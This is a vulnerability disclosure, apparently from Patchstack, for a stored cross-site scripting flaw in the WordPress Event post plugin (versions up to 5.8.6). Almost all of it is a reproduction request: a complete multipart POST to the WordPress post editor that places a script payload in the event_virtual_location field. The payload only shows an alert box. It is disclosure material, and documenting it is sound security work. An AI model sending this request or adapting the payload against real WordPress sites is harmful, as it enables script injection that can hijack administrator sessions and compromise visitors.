XSS champ localisation
Vulnerability description
De Darius
thiennv discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Event post Plugin to Patchstack. How to reproduce
Event post <= 5.8.6 - Stored XSS
POST /wordpress/wp-admin/post.php?post=968&action=edit&meta-box-loader=1&meta-box-loader-nonce=6b6bec58d8&_locale=user HTTP/1.1
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="_wpnonce"
3a2f47678c
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/post-new.php
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="user_ID"
2
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="action"
editpost
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="originalaction"
editpost
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="post_type"
post
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="original_post_status"
auto-draft
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="referredby"
http://thiennv.com/wordpress/wp-admin/edit.php
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="_wp_original_http_referer"
http://thiennv.com/wordpress/wp-admin/edit.php
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="auto_draft"
1
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="post_ID"
968
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="meta-box-order-nonce"
6ddaa3c8f1
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="closedpostboxesnonce"
a883b861c5
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="samplepermalinknonce"
adc7fe713f
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_attendance_mode"
OnlineEventAttendanceMode
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_virtual_location"
"><script>alert(origin)</script>
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="geo_address"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="geo_latitude"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="geo_longitude"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="eventpost_nonce"
118649891c
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/post-new.php
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_status"
EventScheduled
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_begin"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_end"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_color"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_icon"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="comment_status"
open
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="ping_status"
open
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="post_author"
2
-----------------------------1877358560354103854685944162--